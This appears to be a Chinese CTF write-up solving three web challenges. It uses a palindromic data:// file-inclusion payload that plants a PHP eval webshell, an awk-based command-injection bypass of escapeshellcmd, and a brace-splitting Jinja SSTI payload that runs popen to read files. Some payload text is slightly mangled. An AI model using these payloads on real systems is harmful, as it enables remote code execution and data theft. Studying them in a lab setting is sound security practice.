web签到
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
error_reporting(0);
highlight_file(__FILE__);
$file = $_POST['file'];
if(isset($file)){
if(strrev($file)==$file){
include $file;
}
}一道文件包含,就是多了一下字符串反转函数用data://协议即可!
data://text/plain,<?php @eval($_GET[1]);?>>?;)]1[TEG_$(lave@ php?<,nialp/txet//:atad
easyPHP
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
error_reporting(0);
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
$param = $_POST['param'];
if(isset($cmd) && isset($param)){
$cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
shell_exec($cmd);
}
一道简单的rce,cmd得是三个字的命令,这里用到awk。
基本公式:awk ‘条件 {动作}’ 文件名
payload:awk 'BEGIN{system('ls');}' __FILE__
POST
cmd=awk¶m=BEGIN{system("ls>a")}
姻缘测试
用户通过输入控制了网页的内容,盲猜ssti!
在网页源码发现/source路由
def is_hacker(string):
"""整那些个花里胡哨的waf有啥用,还不如这一个,直接杜绝SSTI"""
if "{" in string and "}" in string :
return True
else:
return False看不懂感觉没啥用,我们自己fuzz一下吧
result?boy_name={{'&girl_name='}}这样是可以的
那就打
payload:?boy_name={{%27&girl_name=%27.__class__.__base__.__subclasses__()[132].__init__.__globals__.popen('cat /f*').read()}}